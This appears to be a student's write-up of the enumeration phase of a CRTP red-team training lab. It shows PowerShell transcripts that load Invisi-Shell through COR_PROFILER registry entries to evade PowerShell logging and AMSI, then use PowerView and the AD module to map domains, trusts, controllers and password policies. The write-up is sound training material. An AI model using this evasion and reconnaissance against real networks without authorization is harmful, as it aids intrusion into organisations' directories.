Default Gateway . . . . . . . . . : 172.16.100.254
Insider attack simulation phase

This framework outlines a specific methodology for conducting red team operations, focusing on various
stages of the attack lifecycle without allocating time specifically for reconnaissance.

Domain Enumeration
In this phase, the red team focuses on identifying and mapping out the target organization's domain
infrastructure, including domain controllers, domains, trusts, users, groups, and other resources. This
information is crucial for understanding the environment and planning further attacks.

Local Privilege Escalation

Here, the red team seeks to exploit vulnerabilities in individual systems to escalate privileges and gain
higher levels of access. This could involve exploiting misconfigurations, vulnerabilities, or weaknesses in
local security settings.

Admin Recon
This stage involves reconnaissance specifically focused on administrative users and their privileges within
the network. The red team aims to gather information about administrative accounts, their roles,
responsibilities, and access rights to target high-value accounts for further exploitation.

Lateral Movement
In this phase, the red team explores techniques and avenues for moving laterally across the network from
one compromised system to another. This may involve leveraging stolen credentials, exploiting trust
relationships, or abusing misconfigurations to gain access to additional systems.

Domain Admin Privileges

Obtaining domain admin privileges is a key objective for the red team as it provides full control over the
entire network. This stage involves targeting domain controllers, domain admin accounts, or other critical
infrastructure to achieve this level of access.

Cross Forest Trust Attacks

Here, the red team exploits trust relationships between different domains or forests within the target
organization to expand their foothold and gain access to additional resources or domains.
Persist and Exfiltrate
Finally, the red team focuses on maintaining persistence in the compromised environment and exfiltrating
sensitive data. This involves establishing backdoors, creating persistence mechanisms, and securely
extracting valuable information from the target network.
Active Directory Enumeration
Active Directory enumeration is a crucial phase in the Certified Red Team Professional (CRTP) lab,
providing essential insights into the target environment's structure, users, groups, and permissions. This
chapter outlines the tools and techniques utilized during enumeration, focusing on gathering critical
information for subsequent stages of the red team engagement.

Tools for Enumeration

1. ActiveDirectoryPowerShell module:

o The ActiveDirectoryPowerShell module offers a comprehensive set of cmdlets for

managing and querying Active Directory.

o Utilizing this module allows red teamers to retrieve detailed information about users,
groups, computers, and organizational units within the domain.

o Documentation and resources for utilizing this module can be found here and here.

2. BloodHound (C# and PowerShell Collectors):

o BloodHound is a powerful tool for visualizing and analyzing Active Directory relationships,
trust paths, and potential attack paths.

o Red teamers leverage both C# and PowerShell collectors to gather data on user accounts,
group memberships, permissions, and trust relationships.

o BloodHound aids in identifying security risks, misconfigurations, and high-impact attack

vectors within the AD environment. The repository for BloodHound can be accessed here.

3. PowerView (PowerShell):

o PowerView, a component of the PowerSploit framework, is specifically designed for

Active Directory reconnaissance.

o This PowerShell tool provides a range of cmdlets for querying AD information, including
domain controller enumeration, trust enumeration, and user attribute searching.

o Red teamers can utilize PowerView to gather comprehensive data for assessing the AD
environment's security posture. PowerView's script can be found here.

4. SharpView (C#):

o SharpView is a C# implementation of PowerView, offering similar functionalities for Active

Directory enumeration.

o While it lacks support for filtering using the pipeline, SharpView provides robust
capabilities for querying AD information efficiently.

o Red teamers can leverage SharpView alongside other tools to gather detailed insights into
the target AD environment. The repository for SharpView can be accessed here.
Enumeration Techniques
During the enumeration phase, red teamers employ various techniques to gather comprehensive
information about the Active Directory environment:

1. User Enumeration: Identify existing user accounts, their attributes, group memberships, and
permissions within the domain.

2. Group Enumeration: Enumerate domain groups, including built-in groups, security groups,
distribution groups, and their respective memberships.

3. Computer Enumeration: Discover domain-joined computers, their operating systems, roles, and
configurations.

4. Organizational Unit (OU) Enumeration: Explore the organizational structure of the domain,
including OUs, their hierarchy, and associated permissions.

Loading the Active directory Module

We open a PowerShell session with Invisi-Shell. Since we don’ have administrative privileges, we will run
the RunWithRegistryNonAdmin.bat file to load the PowerShell session. Once a PowerShell session is
opened, we import the Active Directory module. We don’t need RSAT installed for this.
C:\Users\student163>C:\Ad\Tools\InviShell\RunWithRegistryNonAdmin.bat

C:\Users\student163>set COR_ENABLE_PROFILING=1

C:\Users\student163>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Users\student163>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}"

/f
The operation completed successfully.

C:\Users\student163>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-

b283c03916db}\InprocServer32" /f
The operation completed successfully.

C:\Users\student163>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-

b283c03916db}\InprocServer32" /ve /t REG_SZ /d "C:\AD\Tools\InviShell\InShellProf.dll" /f
The operation completed successfully.

C:\Users\student163>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Users\student163> cd C:\Ad\Tools\ADModule-master\
PS C:\Ad\Tools\ADModule-master> Import-Module .\Microsoft.ActiveDirectory.Management.dll
PS C:\Ad\Tools\ADModule-master> Import-Module .\ActiveDirectory\ActiveDirectory.psd1

Loading the Powerview script

C:\Users\student163>C:\Ad\Tools\InviShell\RunWithRegistryNonAdmin.bat
C:\Users\student163>set COR_ENABLE_PROFILING=1

C:\Users\student163>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Users\student163>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}"

/f
The operation completed successfully.

C:\Users\student163>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-

b283c03916db}\InprocServer32" /f
The operation completed successfully.

C:\Users\student163>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-

b283c03916db}\InprocServer32" /ve /t REG_SZ /d "C:\AD\Tools\InviShell\InShellProf.dll" /f
The operation completed successfully.

C:\Users\student163>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Users\student163> . C:\Ad\Tools\PowerView.ps1

Domain Enumeration
Using AD Module
Getting Domain Details
PS C:\Ad\Tools\ADModule-master> Get-ADDomain

AllowedDNSSuffixes : {}
ChildDomains : {us.dollarcorp.moneycorp.local}
ComputersContainer : CN=Computers,DC=dollarcorp,DC=moneycorp,DC=local
DeletedObjectsContainer : CN=Deleted Objects,DC=dollarcorp,DC=moneycorp,DC=local
DistinguishedName : DC=dollarcorp,DC=moneycorp,DC=local
DNSRoot : dollarcorp.moneycorp.local
DomainControllersContainer : OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=local
DomainMode : Windows2016Domain
DomainSID : S-1-5-21-719815819-3726368948-3917688648
ForeignSecurityPrincipalsContainer :
CN=ForeignSecurityPrincipals,DC=dollarcorp,DC=moneycorp,DC=local
Forest : moneycorp.local
InfrastructureMaster : dcorp-dc.dollarcorp.moneycorp.local
LastLogonReplicationInterval :
LinkedGroupPolicyObjects : {CN={31B2F340-016D-11D2-945F-
00C04FB984F9},CN=Policies,CN=System,DC=dollarcorp,DC=
moneycorp,DC=local}
LostAndFoundContainer : CN=LostAndFound,DC=dollarcorp,DC=moneycorp,DC=local
ManagedBy :
Name : dollarcorp
NetBIOSName : dcorp
ObjectClass : domainDNS
ObjectGUID : ae5db372-9c80-40c4-a198-0f655123a9d4
ParentDomain : moneycorp.local
PDCEmulator : dcorp-dc.dollarcorp.moneycorp.local
PublicKeyRequiredPasswordRolling : True
QuotasContainer : CN=NTDS Quotas,DC=dollarcorp,DC=moneycorp,DC=local
ReadOnlyReplicaDirectoryServers : {}
ReplicaDirectoryServers : {dcorp-dc.dollarcorp.moneycorp.local}
RIDMaster : dcorp-dc.dollarcorp.moneycorp.local
SubordinateReferences : {DC=us,DC=dollarcorp,DC=moneycorp,DC=local,
DC=DomainDnsZones,DC=dollarcorp,DC=moneycorp,DC=local}
SystemsContainer : CN=System,DC=dollarcorp,DC=moneycorp,DC=local
UsersContainer : CN=Users,DC=dollarcorp,DC=moneycorp,DC=local

Getting Details of the parent Domain

PS C:\Ad\Tools\ADModule-master> Get-ADDomain -Identity Moneycorp.local

AllowedDNSSuffixes : {}
ChildDomains : {dollarcorp.moneycorp.local}
ComputersContainer : CN=Computers,DC=moneycorp,DC=local
DeletedObjectsContainer : CN=Deleted Objects,DC=moneycorp,DC=local
DistinguishedName : DC=moneycorp,DC=local
DNSRoot : moneycorp.local
DomainControllersContainer : OU=Domain Controllers,DC=moneycorp,DC=local
DomainMode : Windows2016Domain
DomainSID : S-1-5-21-335606122-960912869-3279953914
ForeignSecurityPrincipalsContainer : CN=ForeignSecurityPrincipals,DC=moneycorp,DC=local
Forest : moneycorp.local
InfrastructureMaster : mcorp-dc.moneycorp.local
LastLogonReplicationInterval :
LinkedGroupPolicyObjects : {CN={31B2F340-016D-11D2-945F-
00C04FB984F9},CN=Policies,CN=System,DC=moneycorp,DC=l
ocal}
LostAndFoundContainer : CN=LostAndFound,DC=moneycorp,DC=local
ManagedBy :
Name : moneycorp
NetBIOSName : mcorp
ObjectClass : domainDNS
ObjectGUID : a497ae8b-714e-432f-9b9e-dae80f125ed0
ParentDomain :
PDCEmulator : mcorp-dc.moneycorp.local
PublicKeyRequiredPasswordRolling : True
QuotasContainer : CN=NTDS Quotas,DC=moneycorp,DC=local
ReadOnlyReplicaDirectoryServers : {}
ReplicaDirectoryServers : {mcorp-dc.moneycorp.local}
RIDMaster : mcorp-dc.moneycorp.local
SubordinateReferences : {DC=dollarcorp,DC=moneycorp,DC=local,
DC=ForestDnsZones,DC=moneycorp,DC=local,
DC=DomainDnsZones,DC=moneycorp,DC=local,
CN=Configuration,DC=moneycorp,DC=local}
SystemsContainer : CN=System,DC=moneycorp,DC=local
UsersContainer : CN=Users,DC=moneycorp,DC=local

Getting Details of the trusting Domain

PS C:\Ad\Tools\ADModule-master> Get-ADDomain -Identity eurocorp.local
AllowedDNSSuffixes : {}
ChildDomains : {eu.eurocorp.local}
ComputersContainer : CN=Computers,DC=eurocorp,DC=local
DeletedObjectsContainer : CN=Deleted Objects,DC=eurocorp,DC=local
DistinguishedName : DC=eurocorp,DC=local
DNSRoot : eurocorp.local
DomainControllersContainer : OU=Domain Controllers,DC=eurocorp,DC=local
DomainMode : Windows2016Domain
DomainSID : S-1-5-21-3333069040-3914854601-3606488808
ForeignSecurityPrincipalsContainer : CN=ForeignSecurityPrincipals,DC=eurocorp,DC=local
Forest : eurocorp.local
InfrastructureMaster : eurocorp-dc.eurocorp.local
LastLogonReplicationInterval :
LinkedGroupPolicyObjects : {CN={31B2F340-016D-11D2-945F-
00C04FB984F9},CN=Policies,CN=System,DC=eurocorp,DC=lo
cal}
LostAndFoundContainer : CN=LostAndFound,DC=eurocorp,DC=local
ManagedBy :
Name : eurocorp
NetBIOSName : ecorp
ObjectClass : domainDNS
ObjectGUID : 49aead6b-6265-4473-9469-efe7df77b480
ParentDomain :
PDCEmulator : eurocorp-dc.eurocorp.local
PublicKeyRequiredPasswordRolling : True
QuotasContainer : CN=NTDS Quotas,DC=eurocorp,DC=local
ReadOnlyReplicaDirectoryServers : {}
ReplicaDirectoryServers : {eurocorp-dc.eurocorp.local}
RIDMaster : eurocorp-dc.eurocorp.local
SubordinateReferences : {DC=eu,DC=eurocorp,DC=local,
DC=ForestDnsZones,DC=eurocorp,DC=local,
DC=DomainDnsZones,DC=eurocorp,DC=local,
CN=Configuration,DC=eurocorp,DC=local}
SystemsContainer : CN=System,DC=eurocorp,DC=local
UsersContainer : CN=Users,DC=eurocorp,DC=local

Getting Domain SID

PS C:\Ad\Tools\ADModule-master> (Get-ADDomain).DomainSID.value
S-1-5-21-719815819-3726368948-3917688648
PS C:\Ad\Tools\ADModule-master> (Get-ADDomain -Identity moneycorp.local).DomainSID.value
S-1-5-21-335606122-960912869-3279953914
PS C:\Ad\Tools\ADModule-master> (Get-ADDomain -Identity eurocorp.local).DomainSID.value
S-1-5-21-3333069040-3914854601-3606488808

Getting Domain Controllers information

PS C:\Ad\Tools\ADModule-master> Get-ADDomainController

ComputerObjectDN : CN=DCORP-DC,OU=Domain
Controllers,DC=dollarcorp,DC=moneycorp,DC=local
DefaultPartition : DC=dollarcorp,DC=moneycorp,DC=local
Domain : dollarcorp.moneycorp.local
Enabled : True
Forest : moneycorp.local
HostName : dcorp-dc.dollarcorp.moneycorp.local
InvocationId : 5022a908-f20e-4aca-8c91-f58f4254a9bc
IPv4Address : 172.16.2.1
IPv6Address :
IsGlobalCatalog : True
IsReadOnly : False
LdapPort : 389
Name : DCORP-DC
NTDSSettingsObjectDN : CN=NTDS Settings,CN=DCORP-DC,CN=Servers,CN=Default-First-Site-
Name,CN=Sites,CN=Configurati
on,DC=moneycorp,DC=local
OperatingSystem : Windows Server 2022 Standard
OperatingSystemHotfix :
OperatingSystemServicePack :
OperatingSystemVersion :
10.0 (20348)
OperationMasterRoles :
{PDCEmulator, RIDMaster, InfrastructureMaster}
Partitions :
{DC=DomainDnsZones,DC=dollarcorp,DC=moneycorp,DC=local,
DC=dollarcorp,DC=moneycorp,DC=local,
DC=ForestDnsZones,DC=moneycorp,DC=local,
CN=Schema,CN=Configuration,DC=moneycorp,DC=local...}
ServerObjectDN : CN=DCORP-DC,CN=Servers,CN=Default-First-Site-
Name,CN=Sites,CN=Configuration,DC=moneycorp,D
C=local
ServerObjectGuid : 87b4d65d-a24d-47ea-a3d4-eeba1e58a5f0
Site : Default-First-Site-Name
SslPort : 636

PS C:\Ad\Tools\ADModule-master> Get-ADDomainController -DomainName moneycorp.local -Discover

Domain : moneycorp.local
Forest : moneycorp.local
HostName : {mcorp-dc.moneycorp.local}
IPv4Address : 172.16.1.1
IPv6Address :
Name : MCORP-DC
Site : Default-First-Site-Name

PS C:\Ad\Tools\ADModule-master> Get-ADDomainController -DomainName eurocorp.local -Discover

Domain : eurocorp.local
Forest : eurocorp.local
HostName : {eurocorp-dc.eurocorp.local}
IPv4Address : 172.16.15.1
IPv6Address :
Name : EUROCORP-DC
Site : Default-First-Site-Name

Getting Trust details

In an AD environment, a trust is a relationship between two domains or forests which allows users of one
domain or forest to access resources in the other domain or forest.
Trust can be automatic (parent-child, same forest etc.) or established (forest, external)
Trusted Domain Objects (TDOs) represents the trust relationships in a domain.
Trust Direction
• One-way Trust - Unidirectional - Users in the Trusted Domain can access resources in the trusting
domain, but the converse is not true.
• Two-way Trust - Bidirectional - Users in both the domains can access resources in the other
domains.

Trust Transitivity

• Transitive - A Trust is transitive when it can be extended to establish trust relationships with other
domains. All the default intra-forest trust relationships (tree-root, parent-child) between domains
with in the same forest are transitive two-way trusts.
• Non-Transitive - A Trust is transitive when it cannot be extended to establish trust relationships
with other domains. This can be one-way or two-way.

Types of Trusts

• Parent-Child trusts - It is automatically created between the new domain and the domain that
precedes it in the namespace hierarchy, whenever a new domain is added in the hierarchy. The
trust is always two-way transitive.
• Shortcut trusts - Used to reduce access times in Complex trust scenarios. Can be one way or two-
way transitive.
• External trusts - Trusts established between two domains in two different forests when forests do
not have trust relationship. The trust can be one way or two way and non-transitive
• Forest trusts - The trust is between the forest root domain. It cannot be extended to a third forest
implicitly. The trust can be one way or two ways.

PS C:\Ad\Tools\ADModule-master> Get-ADTrust -Filter *

Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=moneycorp.local,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
ForestTransitive : False
IntraForest : True
IsTreeParent : False
IsTreeRoot : False
Name : moneycorp.local
ObjectClass : trustedDomain
ObjectGUID : 01c3b68d-520b-44d8-8e7f-4c10927c2b98
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=dollarcorp,DC=moneycorp,DC=local
Target : moneycorp.local
TGTDelegation : False
TrustAttributes : 32
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False

Direction : BiDirectional
DisallowTransivity : False
DistinguishedName :
CN=us.dollarcorp.moneycorp.local,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
ForestTransitive : False
IntraForest : True
IsTreeParent : False
IsTreeRoot : False
Name : us.dollarcorp.moneycorp.local
ObjectClass : trustedDomain
ObjectGUID : 3edb04a9-d634-4038-beed-3c057743853f
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=dollarcorp,DC=moneycorp,DC=local
Target : us.dollarcorp.moneycorp.local
TGTDelegation : False
TrustAttributes : 32
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False

Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=eurocorp.local,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
ForestTransitive : False
IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : eurocorp.local
ObjectClass : trustedDomain
ObjectGUID : d4d64a77-63be-4d77-93c2-6524e73d306d
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : True
Source : DC=dollarcorp,DC=moneycorp,DC=local
Target : eurocorp.local
TGTDelegation : False
TrustAttributes : 4
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False

Get Forest Details

PS C:\Ad\Tools\ADModule-master> Get-ADForest
ApplicationPartitions : {DC=ForestDnsZones,DC=moneycorp,DC=local,
DC=DomainDnsZones,DC=us,DC=dollarcorp,DC=moneycorp,DC=local,
DC=DomainDnsZones,DC=dollarcorp,DC=moneycorp,DC=local,
DC=DomainDnsZones,DC=moneycorp,DC=local}
CrossForestReferences : {}
DomainNamingMaster : mcorp-dc.moneycorp.local
Domains : {dollarcorp.moneycorp.local, moneycorp.local,
us.dollarcorp.moneycorp.local}
ForestMode : Windows2016Forest
GlobalCatalogs : {mcorp-dc.moneycorp.local, dcorp-dc.dollarcorp.moneycorp.local,
us-dc.us.dollarcorp.moneycorp.local}
Name : moneycorp.local
PartitionsContainer : CN=Partitions,CN=Configuration,DC=moneycorp,DC=local
RootDomain : moneycorp.local
SchemaMaster : mcorp-dc.moneycorp.local
Sites : {Default-First-Site-Name}
SPNSuffixes : {}
UPNSuffixes : {}

PS C:\Ad\Tools\ADModule-master> Get-ADForest -Identity eurocorp.local

ApplicationPartitions : {DC=ForestDnsZones,DC=eurocorp,DC=local,
DC=DomainDnsZones,DC=eu,DC=eurocorp,DC=local,
DC=DomainDnsZones,DC=eurocorp,DC=local}
CrossForestReferences : {}
DomainNamingMaster : eurocorp-dc.eurocorp.local
Domains : {eurocorp.local, eu.eurocorp.local}
ForestMode : Windows2016Forest
GlobalCatalogs : {eurocorp-dc.eurocorp.local, eu-dc.eu.eurocorp.local}
Name : eurocorp.local
PartitionsContainer : CN=Partitions,CN=Configuration,DC=eurocorp,DC=local
RootDomain : eurocorp.local
SchemaMaster : eurocorp-dc.eurocorp.local
Sites : {Default-First-Site-Name}
SPNSuffixes : {}
UPNSuffixes : {}

Getting Domain SID

PS C:\Users\student163> Get-DomainSID
S-1-5-21-719815819-3726368948-3917688648
PS C:\Users\student163> Get-DomainSID -Domain moneycorp.local
S-1-5-21-335606122-960912869-3279953914
PS C:\Users\student163> Get-DomainSID -Domain eurocorp.local
S-1-5-21-3333069040-3914854601-3606488808

Getting Domain password policy

PS C:\Ad\Tools\ADModule-master> Get-ADDefaultDomainPasswordPolicy

ComplexityEnabled : True
DistinguishedName : DC=dollarcorp,DC=moneycorp,DC=local
LockoutDuration : 00:10:00
LockoutObservationWindow : 00:10:00
LockoutThreshold : 0
MaxPasswordAge : 42.00:00:00
MinPasswordAge : 1.00:00:00
MinPasswordLength : 7
objectClass : {domainDNS}
objectGuid : ae5db372-9c80-40c4-a198-0f655123a9d4
PasswordHistoryCount : 24
ReversibleEncryptionEnabled : False

PS C:\Ad\Tools\ADModule-master> Get-ADDefaultDomainPasswordPolicy -Identity moneycorp.local

ComplexityEnabled : True
DistinguishedName : DC=moneycorp,DC=local
LockoutDuration : 00:10:00
LockoutObservationWindow : 00:10:00
LockoutThreshold : 0
MaxPasswordAge : 42.00:00:00
MinPasswordAge : 1.00:00:00
MinPasswordLength : 7
objectClass : {domainDNS}
objectGuid : a497ae8b-714e-432f-9b9e-dae80f125ed0
PasswordHistoryCount : 24
ReversibleEncryptionEnabled : False

PS C:\Ad\Tools\ADModule-master> Get-ADDefaultDomainPasswordPolicy -Identity eurocorp.local

ComplexityEnabled : True
DistinguishedName : DC=eurocorp,DC=local
LockoutDuration : 00:10:00
LockoutObservationWindow : 00:10:00
LockoutThreshold : 0
MaxPasswordAge : 42.00:00:00
MinPasswordAge : 1.00:00:00
MinPasswordLength : 7
objectClass : {domainDNS}
objectGuid : 49aead6b-6265-4473-9469-efe7df77b480
PasswordHistoryCount : 24
ReversibleEncryptionEnabled : False

Using PowerView
Getting Domain Details
PS C:\Users\student163> Get-Domain

Forest : moneycorp.local
DomainControllers : {dcorp-dc.dollarcorp.moneycorp.local}
Children : {us.dollarcorp.moneycorp.local}
DomainMode : Unknown
DomainModeLevel : 7
Parent : moneycorp.local
PdcRoleOwner : dcorp-dc.dollarcorp.moneycorp.local
RidRoleOwner : dcorp-dc.dollarcorp.moneycorp.local
InfrastructureRoleOwner : dcorp-dc.dollarcorp.moneycorp.local
Name : dollarcorp.moneycorp.local

Getting Details of the parent Domain

PS C:\Users\student163> Get-Domain -Domain moneycorp.local

Forest : moneycorp.local
DomainControllers : {mcorp-dc.moneycorp.local}
Children : {dollarcorp.moneycorp.local}
DomainMode : Unknown
DomainModeLevel : 7
Parent :
PdcRoleOwner : mcorp-dc.moneycorp.local
RidRoleOwner : mcorp-dc.moneycorp.local
InfrastructureRoleOwner : mcorp-dc.moneycorp.local
Name : moneycorp.local

Getting Details of the trusted domain

PS C:\Users\student163> Get-Domain -Domain eurocorp.local

Forest : eurocorp.local
DomainControllers : {eurocorp-dc.eurocorp.local}
Children : {eu.eurocorp.local}
DomainMode : Unknown
DomainModeLevel : 7
Parent :
PdcRoleOwner : eurocorp-dc.eurocorp.local
RidRoleOwner : eurocorp-dc.eurocorp.local
InfrastructureRoleOwner : eurocorp-dc.eurocorp.local
Name : eurocorp.local

Getting Domain Controllers information

PS C:\Users\student163> Get-DomainController

Forest : moneycorp.local
CurrentTime : 6/12/2024 12:13:43 PM
HighestCommittedUsn : 1624954
OSVersion : Windows Server 2022 Standard
Roles : {PdcRole, RidRole, InfrastructureRole}
Domain : dollarcorp.moneycorp.local
IPAddress : 172.16.2.1
SiteName : Default-First-Site-Name
SyncFromAllServersCallback :
InboundConnections : {83cb5211-27b5-41d1-afcf-6e9fbd30de06, f06c66a3-2e50-4f42-8078-
d022cbf1db27}
OutboundConnections : {cb4a4e84-ab09-4e4a-8365-a28ffac2d701, 5cc72b32-ff79-4bb0-8599-
e8be4520eeb3}
Name : dcorp-dc.dollarcorp.moneycorp.local
Partitions : {CN=Configuration,DC=moneycorp,DC=local,
CN=Schema,CN=Configuration,DC=moneycorp,DC=local,
DC=ForestDnsZones,DC=moneycorp,DC=local,
DC=dollarcorp,DC=moneycorp,DC=local...}

PS C:\Users\student163> Get-DomainController -Domain moneycorp.local

Forest : moneycorp.local
CurrentTime : 6/12/2024 12:13:55 PM
HighestCommittedUsn : 226250
OSVersion : Windows Server 2022 Standard
Roles : {SchemaRole, NamingRole, PdcRole, RidRole...}
Domain : moneycorp.local
IPAddress : 172.16.1.1
SiteName : Default-First-Site-Name
SyncFromAllServersCallback :
InboundConnections : {29f15465-5ef6-4d0a-b600-87bf6f56a5a8, cb4a4e84-ab09-4e4a-8365-
a28ffac2d701}
OutboundConnections : {f06c66a3-2e50-4f42-8078-d022cbf1db27, 38e5d7cd-72fd-4b39-bcbf-
9761d5a4c018}
Name : mcorp-dc.moneycorp.local
Partitions : {DC=moneycorp,DC=local, CN=Configuration,DC=moneycorp,DC=local,
CN=Schema,CN=Configuration,DC=moneycorp,DC=local,
DC=DomainDnsZones,DC=moneycorp,DC=local...}

PS C:\Users\student163> Get-DomainController -Domain eurocorp.local

Forest : eurocorp.local
CurrentTime : 6/12/2024 12:14:07 PM
HighestCommittedUsn : 97337
OSVersion : Windows Server 2022 Standard
Roles : {SchemaRole, NamingRole, PdcRole, RidRole...}
Domain : eurocorp.local
IPAddress : 172.16.15.1
SiteName : Default-First-Site-Name
SyncFromAllServersCallback :
InboundConnections : {31ecd411-0565-4989-a695-54cfe44acae5}
OutboundConnections : {e7cbb037-4852-4cfe-921f-04c3f02879e7}
Name : eurocorp-dc.eurocorp.local
Partitions : {DC=eurocorp,DC=local, CN=Configuration,DC=eurocorp,DC=local,
CN=Schema,CN=Configuration,DC=eurocorp,DC=local,
DC=DomainDnsZones,DC=eurocorp,DC=local...}

Getting Trust Details

PS C:\Users\student163> Get-DomainTrust

SourceName : dollarcorp.moneycorp.local
TargetName : moneycorp.local
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection : Bidirectional
WhenCreated : 11/12/2022 5:59:01 AM
WhenChanged : 6/12/2024 5:05:17 AM

SourceName : dollarcorp.moneycorp.local
TargetName : us.dollarcorp.moneycorp.local
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection : Bidirectional
WhenCreated : 11/12/2022 6:22:51 AM
WhenChanged : 6/12/2024 5:01:39 AM

SourceName : dollarcorp.moneycorp.local
TargetName : eurocorp.local
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FILTER_SIDS
TrustDirection : Bidirectional
WhenCreated : 11/12/2022 8:15:23 AM
WhenChanged : 5/18/2024 3:14:25 PM

PS C:\Users\student163> Get-DomainTrust -Domain eurocorp.local

SourceName : eurocorp.local
TargetName : eu.eurocorp.local
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection : Bidirectional
WhenCreated : 11/12/2022 5:49:08 AM
WhenChanged : 6/12/2024 5:18:41 AM

SourceName : eurocorp.local
TargetName : dollarcorp.moneycorp.local
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FILTER_SIDS
TrustDirection : Bidirectional
WhenCreated : 11/12/2022 8:15:23 AM
WhenChanged : 5/18/2024 3:14:25 PM

Getting Domain Password Policy

PS C:\Users\student163> (Get-DomainPolicydata).systemaccess

MinimumPasswordAge : 1
MaximumPasswordAge : 42
MinimumPasswordLength : 7
PasswordComplexity : 1
PasswordHistorySize : 24
LockoutBadCount : 0
RequireLogonToChangePassword : 0
ForceLogoffWhenHourExpire : 0
ClearTextPassword : 0
LSAAnonymousNameLookup : 0
PS C:\Users\student163> (Get-DomainPolicydata -Domain moneycorp.local).systemaccess

MinimumPasswordAge : 1
MaximumPasswordAge : 42
MinimumPasswordLength : 7
PasswordComplexity : 1
PasswordHistorySize : 24
LockoutBadCount : 0
RequireLogonToChangePassword : 0
ForceLogoffWhenHourExpire : 0
ClearTextPassword : 0
LSAAnonymousNameLookup : 0

PS C:\Users\student163> (Get-DomainPolicydata -Domain eurocorp.local).systemaccess

MinimumPasswordAge : 1
MaximumPasswordAge : 42
MinimumPasswordLength : 7
PasswordComplexity : 1
PasswordHistorySize : 24
LockoutBadCount : 0
RequireLogonToChangePassword : 0
ForceLogoffWhenHourExpire : 0
ClearTextPassword : 0
LSAAnonymousNameLookup : 0

Getting Kerberos Policy

PS C:\Users\student163> (Get-DomainPolicydata).KerberosPolicy

MaxTicketAge : 10
MaxRenewAge : 7
MaxServiceAge : 600
MaxClockSkew : 5
TicketValidateClient : 1

PS C:\Users\student163> (Get-DomainPolicydata -Domain moneycorp.local).KerberosPolicy

MaxTicketAge : 10
MaxRenewAge : 7
MaxServiceAge : 600
MaxClockSkew : 5
TicketValidateClient : 1

PS C:\Users\student163> (Get-DomainPolicydata -Domain eurocorp.local).KerberosPolicy

MaxTicketAge : 10
MaxRenewAge : 7
MaxServiceAge : 600
MaxClockSkew : 5
TicketValidateClient : 1

Using .net Methods and nslookup

Getting the Forest, Domain, Child Domain and the Domain Controllers details
PS C:\Users\student163> [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

Forest : moneycorp.local
DomainControllers : {dcorp-dc.dollarcorp.moneycorp.local}
Children : {us.dollarcorp.moneycorp.local}
DomainMode : Unknown
DomainModeLevel : 7
Parent : moneycorp.local
PdcRoleOwner : dcorp-dc.dollarcorp.moneycorp.local
RidRoleOwner : dcorp-dc.dollarcorp.moneycorp.local
InfrastructureRoleOwner : dcorp-dc.dollarcorp.moneycorp.local
Name : dollarcorp.moneycorp.local

Getting the Forest, Domain and the Domain Controllers details

PS C:\Users\student163>
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers

Forest : moneycorp.local
CurrentTime : 6/18/2024 4:30:08 AM
HighestCommittedUsn : 1181007
OSVersion : Windows Server 2022 Standard
Roles : {PdcRole, RidRole, InfrastructureRole}
Domain : dollarcorp.moneycorp.local
IPAddress : 172.16.2.1
SiteName : Default-First-Site-Name
SyncFromAllServersCallback :
InboundConnections : {83cb5211-27b5-41d1-afcf-6e9fbd30de06, f06c66a3-2e50-4f42-8078-
d022cbf1db27}
OutboundConnections : {cb4a4e84-ab09-4e4a-8365-a28ffac2d701, 5cc72b32-ff79-4bb0-8599-
e8be4520eeb3}
Name : dcorp-dc.dollarcorp.moneycorp.local
Partitions : {CN=Configuration,DC=moneycorp,DC=local,
CN=Schema,CN=Configuration,DC=moneycorp,DC=local,
DC=ForestDnsZones,DC=moneycorp,DC=local,
DC=dollarcorp,DC=moneycorp,DC=local...}
Getting the Read Write Domain Controllers of the Domain
PS C:\Users\student163> nslookup -querytype=SRV _LDAP._TCP.DC._MSDCS.dollarcorp.moneycorp.local
DNS request timed out.
timeout was 2 seconds.
Server: UnKnown
Address: 172.16.2.1
